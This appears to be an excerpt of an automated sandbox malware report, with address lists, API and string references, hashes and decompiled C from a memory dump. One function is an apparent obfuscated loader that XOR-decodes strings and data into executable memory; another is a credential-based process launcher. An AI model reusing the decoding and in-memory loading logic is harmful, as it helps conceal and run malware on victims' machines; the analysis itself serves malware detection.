0x00403e2b
0x00403e2f
0x00403e31
0x00403e32
0x00403e33
0x00403e35
0x00403e3a
0x00403e43
0x00403e43
0x00403e46
0x00403e49
0x00403e4f
0x00403e52
0x00000000
0x00000000
0x00403e62
0x00403e6a
0x00403e6a
0x00403e6f
0x00403e72
0x00403e78
0x00403e7f
0x00403e80
0x00403e81
0x00403e82
0x00403e85
0x00000000
0x00000000
0x00403eba
0x00403ec5
0x00403ecf
0x00403ee1
0x00403eeb
0x00403efa
0x00403efd
0x00403f07
0x00403f10
0x00403f17
0x00403f1e
0x00403f26
0x00403f26
0x00403f35
0x00403f3a
0x00403f3d
0x00403f40
0x00000000
0x00000000
0x00403f4e
0x00403f57
0x00403f57
0x00403f58
0x00403f5a
0x00403f62
0x00403f62
0x00403f67
0x00403f6e
0x00403f71
0x00403f74
0x00000000
0x00000000
0x00403f91
0x00403f99
0x00403f99
0x00403fa1
0x00403fad
0x00403fb5
0x00403fbb
0x00403fc2
0x00403ff2
0x00403ffa
0x00403fc4
0x00403fc4
0x00403fca
0x00403fd0
0x00403fd2
0x00403fd4
0x00403fd8
0x00403fde
0x00403fde
0x00403fde
0x00403fe1
0x00403fe7
0x00403fe7
0x00403fe7
0x00403fed
0x00403ff1
0x00403ff1
0x00403e87
0x00403e87
0x00403e88
0x00403e89
0x00403e89
0x00403e8b
0x00403e8b
0x00403e90
0x00403e91
0x00403e92
0x00403e92
0x00403e92
0x00403e9a
0x00403ea1
0x00403eab
0x00403eac
0x00403eae
0x00403eb4
0x00403eb6
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000,00008000,00001000,00000040,?,dFWnLGVOFkBMGOFb#,?,uJQWVBObOOL@#,00000068), ref: 00403E1F

Strings

O, xrefs: 00403D18
O, xrefs: 00403D40
O, xrefs: 00403D48
dFWnLGVOFkBMGOFb#, xrefs: 00403DA6
#, xrefs: 00403D0C
#, xrefs: 00403D14
M, xrefs: 00403D08
#, xrefs: 00403D2C
G, xrefs: 00403D38
#, xrefs: 00403D04
y@5, xrefs: 00403EFA
#, xrefs: 00403D1C
#, xrefs: 00403D44
#, xrefs: 00403D24
#, xrefs: 00403D4C
#, xrefs: 00403D54
F, xrefs: 00403D10
uJQWVBObOOL@#, xrefs: 00403D7A
#, xrefs: 00403CFC
Q, xrefs: 00403D00
#, xrefs: 00403D34
#, xrefs: 00403D50
#, xrefs: 00403D3C

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: AllocVirtual
String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$F$G$M$O$O$O$Q$dFWnLGVOFkBMGOFb#$uJQWVBObOOL@#$y@5
API String ID: 4275171209-4115419081
Opcode ID: 5ebb87bf78d45b5c031d0c1eb7753563c51c41fef1cb5d3c2df08c906f0ff980
Instruction ID: e6bc0ae78d1f22013d6df193e1b5c635bc42909568071c41625d6076054c4d26
Opcode Fuzzy Hash: 5ebb87bf78d45b5c031d0c1eb7753563c51c41fef1cb5d3c2df08c906f0ff980
Instruction Fuzzy Hash: A2B1C471D08288CFEB11CFA8C494BDDBFB4AF56309F1440AAD549AB382C7799A84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00403DE2 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 47
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00403DE2(signed int __ebx, signed int __edi) {
				long _t122;
				intOrPtr* _t124;
				intOrPtr* _t125;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t150;
				void* _t152;
				signed int _t171;
				signed char _t174;
				signed int _t175;
				intOrPtr _t181;
				signed int _t185;
				signed int _t197;
				signed int _t200;
				void* _t202;
				signed int _t204;
				void* _t205;

				L0:
				while(1) {
					L0:
					_t200 = __edi;
					_t171 = __ebx;
					asm("fisttp qword [ebp-0x17af63bb]");
					L1:
					 *(_t204 - 0x68) =  *(_t204 - 0x68) + 1;
					L2:
					if( *(_t204 - 0x68) < 0x1a) {
						L3:
						 *(_t204 +  *(_t204 - 0x68) - 0x64) =  *(_t204 +  *(_t204 - 0x68) - 0x64) ^ 0x00000023;
						continue;
					}
					L4:
					 *(_t204 - 0x74) = E00404187();
					_t12 = _t204 - 0x34; // 0x75
					 *((intOrPtr*)(_t204 - 0x78)) = E004042A7( *(_t204 - 0x74), _t12);
					_t15 = _t204 - 0x48; // 0x64
					_t174 =  *(_t204 - 0x74);
					 *((intOrPtr*)(_t204 - 0x7c)) = E004042A7(_t174, _t15);
					_t122 =  *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc));
					__eflags = _t122;
					 *((intOrPtr*)(_t204 - 0x80)) = VirtualAlloc(0, _t122, 0x1000, 0x40);
					_t124 =  *((intOrPtr*)(_t204 - 0x7c))(0, _t204 - 0x64);
					do {
						L5:
						__eflags =  *(_t174 - 0x837b) & _t174;
						L6:
						__eflags =  *(_t200 + _t200 * 8 - 1) & _t200;
						_t200 = _t200 + 1;
						_t205 = _t204 + 1;
						_t125 = _t124;
						 *_t125 =  *_t125 + _t125;
						 *_t125 =  *_t125 + _t125;
						 *((intOrPtr*)(_t205 - 0x70)) =  *((intOrPtr*)(_t205 - 0x80));
						_t128 =  *((intOrPtr*)(_t205 - 0x84)) +  *((intOrPtr*)(_t205 - 4));
						__eflags = _t128;
						 *(_t205 - 0x6c) = _t128;
						while(1) {
							L7:
							__eflags =  *(_t205 - 0x68) -  *((intOrPtr*)(_t205 - 8)) +  *((intOrPtr*)(_t205 - 0xc));
							if( *(_t205 - 0x68) >=  *((intOrPtr*)(_t205 - 8)) +  *((intOrPtr*)(_t205 - 0xc))) {
								break;
							}
							L8:
							 *((char*)( *((intOrPtr*)(_t205 - 0x70)) +  *(_t205 - 0x68))) =  *((intOrPtr*)( *(_t205 - 0x6c) +  *(_t205 - 0x68)));
							 *(_t205 - 0x68) =  *(_t205 - 0x68) + 1;
						}
						L9:
						_t131 =  *((intOrPtr*)(_t205 - 0x80));
						 *((intOrPtr*)(_t205 - 0x88)) = _t131;
						 *(_t205 - 0x68) = 0;
						_t175 =  *(_t205 - 0x68);
						L10:
						_t204 = _t205 - 1;
						_t124 = _t131;
						__eflags = _t175;
						if(_t175 != 0) {
							goto L11;
						}
						L14:
						 *((intOrPtr*)(_t204 + 0xfffffffffffffe60)) =  *((intOrPtr*)(_t204 - 0x14));
						 *((intOrPtr*)(_t204 + 0xfffffffffffffe64)) =  *((intOrPtr*)(_t204 - 0x10));
						 *((intOrPtr*)(_t204 + 0xfffffffffffffe61)) =  *((intOrPtr*)(_t204 - 0x1c));
						 *((intOrPtr*)(_t204 + 0xbada11)) =  *((intOrPtr*)(_t204 - 0x18));
						_t63 = _t204 - 0x24; // 0xee354079
						 *((intOrPtr*)(_t204 + 0xfffffffffffffe61)) =  *_t63;
						 *((intOrPtr*)(_t204 + 0xbada11)) =  *((intOrPtr*)(_t204 - 0x20));
						_t69 = _t204 - 0x1a0; // 0xe449bebf
						_t70 = _t204 - 0x188; // 0xe449bed7
						E004043B7(_t70, _t69, 0x18);
						_t141 =  *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc));
						__eflags =  *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc));
						E00404497( *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc)), _t204 - 0x188,  *((intOrPtr*)(_t204 - 0x70)), _t141);
						while(1) {
							L15:
							__eflags =  *(_t204 - 0x68) -  *((intOrPtr*)(_t204 - 8));
							if( *(_t204 - 0x68) >=  *((intOrPtr*)(_t204 - 8))) {
								break;
							}
							L16:
							_t185 =  *( *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68)) ^ 0x00000057;
							_t197 =  *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68);
							__eflags = _t197;
							L17:
							_push(_t204);
							 *_t197 = _t185;
							 *(_t204 - 0x68) =  *(_t204 - 0x68) + 1;
						}
						L18:
						 *(_t204 - 0x68) = 0;
						while(1) {
							L19:
							__eflags =  *(_t204 - 0x68) -  *((intOrPtr*)(_t204 - 8));
							if( *(_t204 - 0x68) >=  *((intOrPtr*)(_t204 - 8))) {
								break;
							}
							L20:
							 *( *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68)) =  *( *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68)) ^ 0x000000c4;
							 *(_t204 - 0x68) =  *(_t204 - 0x68) + 1;
						}
						L21:
						 *((intOrPtr*)(_t204 - 0x1a4)) =  *((intOrPtr*)(_t204 - 0x80));
						 *((intOrPtr*)(_t204 - 0x1a8)) =  *((intOrPtr*)(_t204 - 0x80)) +  *((intOrPtr*)(_t204 - 8));
						 *(_t204 - 0x1ac) = _t204;
						__eflags =  *(_t204 - 0x1ac);
						if( *(_t204 - 0x1ac) == 0) {
							L25:
							__eflags = 0;
							return 0;
						} else {
							L22:
							_t150 =  *(_t204 - 0x1ac);
							_t181 =  *((intOrPtr*)(_t204 - 0x1a4));
							 *((intOrPtr*)(_t150 + 4)) = _t181;
							L23:
							_t152 = _t150 - 1 + 0x8b;
							__eflags =  *(_t202 + _t200 * 8 - 1) & _t171;
							 *((intOrPtr*)(_t171 - 0x1a773)) =  *((intOrPtr*)(_t171 - 0x1a773)) - 1;
							_t109 = _t181 - 0x7a74f0b8;
							 *_t109 =  *(_t181 - 0x7a74f0b8) - 1;
							__eflags =  *_t109;
							L24:
							if (__eflags != 0) goto 0x3e9c6c;
							_t111 = _t171 + 0x4889f44d;
							 *_t111 =  *(_t171 + 0x4889f44d) - 1;
							__eflags =  *_t111;
							_push(ss);
							return _t152;
						}
						L26:
						L11:
						asm("outsb");
						asm("out dx, eax");
						_t174 = _t175 + _t175;
						__eflags = _t174;
						asm("bound eax, [ebp+0x5d]");
					} while (_t174 > 0);
					_push(_t202);
					asm("pushfd");
					_t49 = _t200;
					_t200 =  *[ds:eax+0x9ce34e4];
					 *[ds:eax+0x9ce34e4] = _t49;
					asm("invalid");
					L13:
					 *0xb013c9d6 = 0x93;
					asm("lahf");
					asm("jecxz 0x7f");
					asm("aas");
					_t204 = 0xffffffffe449c05f;
					__eflags = 0x513594d4;
					goto L14;
				}
			}

0x00403de2
0x00403de2
0x00403de2
0x00403de2
0x00403de2
0x00403de2
0x00403dc0
0x00403dc6
0x00403dc9
0x00403dcd
0x00403dcf
0x00403ddd
0x00000000
0x00403ddd
0x00403de3
0x00403dec
0x00403def
0x00403dfc
0x00403dff
0x00403e03
0x00403e0c
0x00403e19
0x00403e19
0x00403e22
0x00403e27
0x00403e29
0x00403e29
0x00403e29
0x00403e2b
0x00403e2b
0x00403e2f
0x00403e31
0x00403e32
0x00403e33
0x00403e35
0x00403e3a
0x00403e43
0x00403e43
0x00403e46
0x00403e49
0x00403e49
0x00403e4f
0x00403e52
0x00000000
0x00000000
0x00403e54
0x00403e62
0x00403e6a
0x00403e6a
0x00403e6f
0x00403e6f
0x00403e72
0x00403e78
0x00403e7f
0x00403e80
0x00403e80
0x00403e81
0x00403e82
0x00403e85
0x00000000
0x00000000
0x00403eba
0x00403ec5
0x00403ecf
0x00403ee1
0x00403eeb
0x00403efa
0x00403efd
0x00403f07
0x00403f10
0x00403f17
0x00403f1e
0x00403f26
0x00403f26
0x00403f35
0x00403f3a
0x00403f3a
0x00403f3d
0x00403f40
0x00000000
0x00000000
0x00403f42
0x00403f4e
0x00403f57
0x00403f57
0x00403f58
0x00403f58
0x00403f5a
0x00403f62
0x00403f62
0x00403f67
0x00403f67
0x00403f6e
0x00403f6e
0x00403f71
0x00403f74
0x00000000
0x00000000
0x00403f76
0x00403f91
0x00403f99
0x00403f99
0x00403f9e
0x00403fa1
0x00403fad
0x00403fb5
0x00403fbb
0x00403fc2
0x00403ff2
0x00403ff2
0x00403ffa
0x00403fc4
0x00403fc4
0x00403fc4
0x00403fca
0x00403fd0
0x00403fd1
0x00403fd2
0x00403fd4
0x00403fd8
0x00403fde
0x00403fde
0x00403fde
0x00403fe1
0x00403fe1
0x00403fe7
0x00403fe7
0x00403fe7
0x00403fed
0x00403ff1
0x00403ff1
0x00000000
0x00403e87
0x00403e87
0x00403e88
0x00403e89
0x00403e89
0x00403e8b
0x00403e8b
0x00403e90
0x00403e91
0x00403e92
0x00403e92
0x00403e92
0x00403e9a
0x00403e9c
0x00403ea1
0x00403eab
0x00403eac
0x00403eae
0x00403eb4
0x00403eb6
0x00000000
0x00403eb6

APIs

VirtualAlloc.KERNELBASE(00000000,00008000,00001000,00000040,?,dFWnLGVOFkBMGOFb#,?,uJQWVBObOOL@#,00000068), ref: 00403E1F

Strings

uJQWVBObOOL@#, xrefs: 00403DF2
dFWnLGVOFkBMGOFb#, xrefs: 00403DFF, 00403E02

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: AllocVirtual
String ID: dFWnLGVOFkBMGOFb#$uJQWVBObOOL@#
API String ID: 4275171209-32457125
Opcode ID: 9a435683e006fc2200f94c214ff02a7fea3549497dd79e23f24808265594c5bd
Instruction ID: 28eac0dd6a60f70cb0f7fb81e1a4c1d8d0000c78f9a7ce57a617be8f1ae4712d
Opcode Fuzzy Hash: 9a435683e006fc2200f94c214ff02a7fea3549497dd79e23f24808265594c5bd
Instruction Fuzzy Hash: 3D11A275D04208DFDB64CFA8C881B9DBBB5BF09309F2401A9E609AB282DB35A940CF14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402050 Relevance: 109.1, APIs: 43, Strings: 19, Instructions: 573
windowprocesssleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00402050(struct HINSTANCE__* __ecx, void __edx, void* __eflags, void* __fp0, void* _a4) {
				signed int _v8;
				signed int _v12;
				short _v1052;
				char _v2082;
				char _v2084;
				char _v2762;
				char _v2764;
				char _v3282;
				char _v3284;
				char _v3802;
				char _v3804;
				struct _STARTUPINFOW _v3876;
				short _v3900;
				short _v3904;
				char _v3944;
				struct HWND__* _v3948;
				struct _WNDCLASSEXW _v4024;
				struct _PROCESS_INFORMATION _v4040;
				struct HWND__* _v4044;
				intOrPtr _v4048;
				intOrPtr _v4052;
				intOrPtr _v4056;
				char _v4060;
				void* _v4064;
				char _v4068;
				void* _v4072;
				char _v4073;
				void _v4080;
				void* _v4081;
				struct HWND__* _v4088;
				intOrPtr _v4092;
				void* _v4096;
				void* _v4100;
				void* _v4104;
				void* _v4132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t183;
				struct HWND__* _t198;
				void* _t199;
				void* _t204;
				void* _t206;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t219;
				void* _t221;
				void* _t228;
				void* _t230;
				void* _t231;
				void* _t238;
				void* _t239;
				intOrPtr _t240;
				int _t241;
				short _t245;
				struct HWND__* _t246;
				void* _t248;
				signed int _t249;
				struct HWND__* _t252;
				void* _t253;
				short _t254;
				struct HWND__* _t256;
				void* _t258;
				void* _t259;
				void* _t273;
				void* _t275;
				void* _t276;
				void _t322;
				void* _t326;
				void* _t328;
				intOrPtr _t329;
				struct HINSTANCE__* _t333;
				struct HWND__* _t334;
				void* _t335;
				void* _t341;
				signed int _t342;
				void* _t343;
				signed int _t344;
				signed int _t346;
				signed int _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t357;
				void* _t372;

				_t372 = __fp0;
				_t346 = (_t344 & 0xfffffff8) - 0xff4;
				_t183 =  *0x413004; // 0xf284055d
				_v8 = _t183 ^ _t346;
				_t322 = __edx;
				_t333 = __ecx;
				_v4080 = __edx;
				_v4088 = 0;
				_v2764 = 0;
				E00409280(__edx,  &_v2762, 0, 0x2a2);
				_v2084 = 0;
				E00409280(_t322,  &_v2082, 0, 0x402);
				_v3284 = 0;
				E00409280(_t322,  &_v3282, 0, 0x200);
				_v3804 = 0;
				E00409280(_t322,  &_v3802, 0, 0x206);
				_v3948 = 0;
				E00409280(_t322,  &_v3944, 0, 0x40);
				_v4060 = 0;
				_v4068 = 0;
				_v4044 = 0;
				_v4072 = 0;
				_v4081 = 0;
				_v4073 = 0;
				_t351 = _t346 + 0x3c;
				_v4056 = 0;
				_v4052 = 0;
				_v4048 = 0;
				E00401800(_t322,  &_a4, _t333);
				_t273 = _a4;
				if(_t273 < 2) {
					L96:
					_v4024.cbSize = 0x30;
					_v4024.style = 3;
					_v4024.lpfnWndProc = E00401D50;
					_v4024.cbClsExtra = 0;
					_v4024.cbWndExtra = 0x1e;
					_v4024.hInstance = _t333;
					_v4024.hIcon = LoadIconW(_t333, L"ICON");
					_v4024.hIconSm.hwnd = LoadIconW(_t333, L"ICON");
					_v4024.hCursor = LoadCursorW(0, 0x7f00);
					_v4024.hbrBackground = 0x10;
					_v4024.lpszMenuName = 0;
					_v4024.lpszClassName = L"SHELLRUNAS";
					RegisterClassExW( &_v4024);
					_t198 = CreateDialogParamW(_t333, L"AboutUsage", 0, E00401D50, 0);
					_t310 =  &(_v4024.hIconSm);
					_t334 = _t198;
					_t199 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
					__eflags = _t199;
					if(_t199 == 0) {
						L100:
						_v4092 = 0x57;
						L101:
						LocalFree(_v4072);
						_pop(_t326);
						_pop(_t335);
						_pop(_t275);
						return E0040318A(_v4092, _t275, _v12 ^ _t351, _t310, _t326, _t335);
					} else {
						goto L97;
					}
					do {
						L97:
						_t204 = IsDialogMessageW(_t334,  &(_v4024.hIconSm));
						__eflags = _t204;
						if(_t204 == 0) {
							TranslateMessage( &(_v4024.hIconSm));
							_t310 =  &(_v4024.hIconSm);
							DispatchMessageW( &(_v4024.hIconSm));
						}
						_t206 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
						__eflags = _t206;
					} while (_t206 != 0);
					goto L100;
				}
				_t328 = _v4080 + 4;
				_v4064 = _t328;
				_t209 = E0040346A(_t273, _t343,  *(_v4080 + 4), L"/?");
				_t351 = _t351 + 8;
				if(_t209 == 0) {
					goto L96;
				}
				_t211 = E0040346A(_t273, _t343,  *_t328, L"/raw");
				_t352 = _t351 + 8;
				if(_t211 != 0) {
					_t310 =  *_t328;
					_t212 = E0040346A(_t273, _t343, _t310, L"/reg");
					_t353 = _t352 + 8;
					__eflags = _t212;
					if(_t212 != 0) {
						_t214 = E0040346A(_t273, _t343,  *_t328, L"/regnetonly");
						_t354 = _t353 + 8;
						__eflags = _t214;
						if(_t214 != 0) {
							_t286 =  *_t328;
							_t215 = E0040346A(_t273, _t343,  *_t328, L"/unreg");
							_t355 = _t354 + 8;
							__eflags = _t215;
							if(_t215 != 0) {
								_t216 = E0040346A(_t273, _t343,  *_t328, L"/netonly");
								_t352 = _t355 + 8;
								__eflags = _t216;
								if(_t216 == 0) {
									__eflags = _t273 - 2;
									_v4072 = 1;
									if(_t273 > 2) {
										_t341 = _v4080 + 8;
										__eflags = _t341;
										memcpy(_t328, _t341, _t273 - 2 << 2);
										_t352 = _t352 + 0xc;
										_t328 = _v4064;
									}
									__eflags = _t273;
								}
								L28:
								E004036E5( &_v3804, 0x104,  *_t328);
								_t310 =  &_v3804;
								_t219 = E004029C0( *_t328, __eflags, _t372,  &_v3804);
								_t357 = _t352 + 0x10;
								__eflags = _t219;
								_v4088 = _t219;
								if(__eflags == 0) {
									_push( &_v4068);
									_push(_v4072);
									_push(_v4080);
									_t310 =  &_v3804;
									_t221 = E00402F60(_t273,  &_v4073,  &_v3804, __eflags, _t372);
									_t351 = _t357 + 0xc;
									__eflags = _t221;
									_v4088 = _t221;
									if(_t221 != 0) {
										goto L101;
									} else {
										goto L31;
									}
									while(1) {
										L31:
										E00409280(_t328,  &_v2084, 0, 0x202);
										E00409280(_t328,  &_v2764, 0, 0x152);
										E00409280(_t328,  &_v3284, 0, 0x101);
										_push(_v4088);
										_push( &_v3284);
										_t310 =  &_v2084;
										_push( &_v2084);
										_push(_v4072);
										_t328 =  &_v2764;
										_t228 = E00402CB0( *_v4064, _t328, __eflags, _t372);
										_t351 = _t351 + 0x34;
										__eflags = _t228;
										_v4088 = _t228;
										if(_t228 != 0) {
											goto L101;
										}
										_t276 = _v4072;
										__eflags = _t276;
										_t230 =  &_v3284;
										_v3948 = 0x44;
										_t310 =  &_v2084;
										_v3904 = 1;
										_v3900 = 1;
										__imp__CreateProcessWithLogonW( &_v2084, _t328, _t230, (0 | _t276 != 0x00000000) + 1, 0, _v4068, 0, 0, 0,  &_v3948,  &_v4060);
										__eflags = _t230;
										if(_t230 != 0) {
											__eflags = _t276;
											if(_t276 == 0) {
												L37:
												__eflags = _v4132 - 0x52e;
												if(_v4132 == 0x52e) {
													continue;
												}
												__eflags = _v4132 - 0x8007052e;
												if(_v4132 == 0x8007052e) {
													continue;
												}
												__eflags = _v4132 - 0xc000006d;
												if(_v4132 == 0xc000006d) {
													continue;
												}
												__eflags = _v4132 - 0xd000006d;
												if(_v4132 == 0xd000006d) {
													continue;
												}
												__eflags = _v4132 - 5;
												if(_v4132 == 5) {
													continue;
												}
												__eflags = _v4132 - 0x80070005;
												if(_v4132 == 0x80070005) {
													continue;
												}
												__eflags = _v4132 - 0xc0000022;
												if(_v4132 == 0xc0000022) {
													continue;
												}
												__eflags = _v4132 - 0xd0000022;
												if(_v4132 == 0xd0000022) {
													continue;
												}
												__eflags = _v4132 - 0x56;
												if(_v4132 == 0x56) {
													continue;
												}
												__eflags = _v4132 - 0x80070056;
												if(_v4132 == 0x80070056) {
													continue;
												}
												__eflags = _v4132 - 0xc000006a;
												if(_v4132 == 0xc000006a) {
													continue;
												}
												__eflags = _v4132 - 0xd000006a;
												if(_v4132 == 0xd000006a) {
													continue;
												}
												__eflags = _v4132 - 0x8009030e;
												if(_v4132 == 0x8009030e) {
													continue;
												}
												__eflags = _v4132 - 0x8009030c;
												if(_v4132 == 0x8009030c) {
													continue;
												}
												__eflags = _v4132 - 0x4f1;
												if(_v4132 == 0x4f1) {
													continue;
												}
												__eflags = _v4132 - 0x800704f1;
												if(_v4132 == 0x800704f1) {
													continue;
												}
												__eflags = _v4132 - 0xc0000388;
												if(_v4132 == 0xc0000388) {
													continue;
												}
												__eflags = _v4132 - 0xd0000388;
												if(_v4132 == 0xd0000388) {
													continue;
												}
												__eflags = _v4132 - 0x532;
												if(_v4132 == 0x532) {
													continue;
												}
												__eflags = _v4132 - 0x80070532;
												if(_v4132 == 0x80070532) {
													continue;
												}
												__eflags = _v4132 - 0xc0000071;
												if(_v4132 == 0xc0000071) {
													continue;
												}
												__eflags = _v4132 - 0xd0000071;
												if(_v4132 == 0xd0000071) {
													continue;
												}
												__eflags = _v4132 - 0x773;
												if(_v4132 == 0x773) {
													continue;
												}
												__eflags = _v4132 - 0x80070773;
												if(_v4132 == 0x80070773) {
													continue;
												}
												__eflags = _v4132 - 0xc0000224;
												if(_v4132 == 0xc0000224) {
													continue;
												}
												__eflags = _v4132 - 0xd0000224;
												if(_v4132 == 0xd0000224) {
													continue;
												}
												__eflags = _v4132 - 0x8c2;
												if(_v4132 == 0x8c2) {
													continue;
												}
												__eflags = _v4132 - 0x800708c2;
												if(_v4132 == 0x800708c2) {
													continue;
												}
												__eflags = _v4132 - 0x78f;
												if(_v4132 == 0x78f) {
													continue;
												}
												__eflags = _v4132 - 0x8007078f;
												if(_v4132 == 0x8007078f) {
													continue;
												}
												__eflags = _v4132 - 0xc0000413;
												if(_v4132 == 0xc0000413) {
													continue;
												}
												__eflags = _v4132 - 0xd0000413;
												if(_v4132 == 0xd0000413) {
													continue;
												}
												__eflags = _v4132 - 0x533;
												if(_v4132 == 0x533) {
													continue;
												}
												__eflags = _v4132 - 0x80070533;
												if(_v4132 == 0x80070533) {
													continue;
												}
												__eflags = _v4132 - 0xc0000072;
												if(_v4132 == 0xc0000072) {
													continue;
												}
												__eflags = _v4132 - 0xd0000072;
												if(_v4132 == 0xd0000072) {
													continue;
												}
												__eflags = _v4132 - 0x52f;
												if(_v4132 == 0x52f) {
													continue;
												}
												__eflags = _v4132 - 0x8007052f;
												if(_v4132 == 0x8007052f) {
													continue;
												}
												__eflags = _v4132 - 0xc000006e;
												if(_v4132 == 0xc000006e) {
													continue;
												}
												__eflags = _v4132 - 0xd000006e;
												if(_v4132 == 0xd000006e) {
													continue;
												}
												__eflags = _v4132 - 0x775;
												if(_v4132 == 0x775) {
													continue;
												}
												__eflags = _v4132 - 0x80070775;
												if(_v4132 == 0x80070775) {
													continue;
												}
												__eflags = _v4132 - 0xc0000234;
												if(_v4132 == 0xc0000234) {
													continue;
												}
												__eflags = _v4132 - 0xd0000234;
												if(_v4132 == 0xd0000234) {
													continue;
												}
												__eflags = _v4132 - 0x701;
												if(_v4132 == 0x701) {
													continue;
												}
												__eflags = _v4132 - 0x80070701;
												if(_v4132 == 0x80070701) {
													continue;
												}
												__eflags = _v4132 - 0xc0000193;
												if(_v4132 == 0xc0000193) {
													continue;
												}
												__eflags = _v4132 - 0xd0000193;
												if(_v4132 == 0xd0000193) {
													continue;
												}
												__eflags = _v4132 - 0x569;
												if(_v4132 == 0x569) {
													continue;
												}
												__eflags = _v4132 - 0x80070569;
												if(_v4132 == 0x80070569) {
													continue;
												}
												__eflags = _v4132 - 0xc000015b;
												if(_v4132 == 0xc000015b) {
													continue;
												}
												_t231 = _v4132;
												__eflags = _t231 - 0xd000015b;
												if(_t231 == 0xd000015b) {
													continue;
												}
												__eflags = _t231;
												if(_t231 == 0) {
													L95:
													_t310 = _v4104;
													CloseHandle(_v4104);
													CloseHandle(_v4100);
													goto L101;
												}
												E00401880(L"Error launching application", _t231);
												_t351 = _t351 + 4;
												goto L101;
											}
											E00403926( &(_v3876.dwYSize), 0x104);
											_t238 = E0040360D( &(_v3876.dwYSize), L"cmd.exe");
											_t351 = _t351 + 0x10;
											__eflags = _t238;
											if(_t238 != 0) {
												goto L37;
											}
											_t310 =  &_v4096;
											_t239 = EnumWindows(E00402000,  &_v4096);
											__eflags = _t239;
											if(_t239 != 0) {
												_t329 = _v4092;
												while(1) {
													__eflags = _v4100;
													if(_v4100 == 0) {
														goto L95;
													}
													_t240 = _t329;
													_t329 = _t329 + 1;
													__eflags = _t240 - 5;
													if(_t240 >= 5) {
														goto L95;
													}
													Sleep(0xa);
													_t241 = EnumWindows(E00402000,  &_v4100);
													__eflags = _t241;
													if(_t241 != 0) {
														continue;
													}
													goto L95;
												}
												goto L95;
											}
											goto L37;
										}
										_v4132 = GetLastError();
										goto L37;
									}
									goto L101;
								}
								E00401880(L"Error launching program", _t219);
								_t351 = _t357 + 4;
								goto L101;
							}
							__eflags = _t273 - 2;
							if(_t273 <= 2) {
								L22:
								_t245 = _v4081;
								L23:
								__eflags = _t245;
								_t246 = E00401930(_t286 & 0xffffff00 | _t245 == 0x00000000);
								_t351 = _t355 + 4;
								_v4088 = _t246;
								goto L101;
							}
							_t310 = _v4080;
							_t248 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/quiet");
							_t355 = _t355 + 8;
							__eflags = _t248;
							_t245 = 1;
							if(_t248 == 0) {
								goto L23;
							}
							goto L22;
						}
						__eflags = _t273 - 2;
						if(_t273 <= 2) {
							L17:
							_t249 = _v4081;
							L18:
							__eflags = _t249;
							_t252 = E00401BA0(1, _t333, _t249, _t249 & 0xffffff00 | _t249 == 0x00000000);
							_t351 = _t354 + 4;
							_v4088 = _t252;
							goto L101;
						}
						_t310 =  *(_v4080 + 8);
						_t253 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/quiet");
						_t354 = _t354 + 8;
						__eflags = _t253;
						_t249 = 1;
						if(_t253 == 0) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t273 - 2;
					if(_t273 <= 2) {
						L12:
						_t254 = _v4081;
						L13:
						__eflags = _t254;
						_t256 = E00401BA0(0, _t333, __eflags, _t310);
						_t351 = _t353 + 4;
						_v4088 = _t256;
						goto L101;
					}
					_t258 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/quiet");
					_t353 = _t353 + 8;
					__eflags = _t258;
					_t254 = 1;
					if(_t258 == 0) {
						goto L13;
					}
					goto L12;
				}
				_t342 = 2;
				if(_t273 <= 2) {
					goto L28;
				}
				_t259 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/netonly");
				_t352 = _t352 + 8;
				if(_t259 == 0) {
					_t30 = _t259 + 3; // 0x3
					_t342 = _t30;
					SetEnvironmentVariableW(L"__COMPAT_LAYER", L"RunAsInvoker");
				}
				if(_t273 <= _t342) {
					goto L28;
				}
				E00409280(_t328,  &(_v3876.lpReserved), 0, 0x40);
				_v4040.hProcess = 0;
				_v4040.hThread = 0;
				_v4040.dwProcessId = 0;
				_v4040.dwThreadId = 0;
				_v3876.cb = 0x44;
				_v3876.wShowWindow = 1;
				E004036E5( &_v1052, 0x208, L"cmd /c start ");
				E0040366B( &_v1052, 0x208,  *((intOrPtr*)(_v4080 + _t342 * 4)));
				_t351 = _t352 + 0x24;
				_t310 =  &_v4040;
				if(CreateProcessW(0,  &_v1052, 0, 0, 0, 0x8000000, 0, 0,  &_v3876,  &_v4040) == 0) {
					_v4088 = GetLastError();
				}
				goto L101;
			}

0x00402050
0x00402056
0x0040205c
0x00402063
0x0040207b
0x0040207f
0x00402081
0x00402085
0x00402089
0x00402091
0x004020a7
0x004020af
